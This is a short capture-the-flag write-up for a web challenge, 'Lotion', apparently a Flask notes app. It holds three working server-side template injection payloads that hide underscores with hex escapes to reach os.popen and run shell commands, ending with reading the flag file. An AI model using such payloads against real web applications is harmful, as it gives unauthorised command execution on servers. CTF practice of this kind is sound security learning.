Lotion
Category: Web
100 points
I am trying to make my own version of Notion, named Lotion. Can you do a security check for my app? http://chall.nitdgplug.org:30014/
Solution
Just another notes web app.
Let's see... oh damn, where's my {{ 4 + 4 }}? Looks like we've got server-side template injection here.
After a few attempts I finally exploited it with this payload:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls -al')|attr('read')()}}
Going deeper with:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls -al secret-note')|attr('read')()}}
Gotcha!
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('cat secret-note/flag')|attr('read')()}}
Flag
GLUG{INJECTED_PR3TTY_G00D_HUH}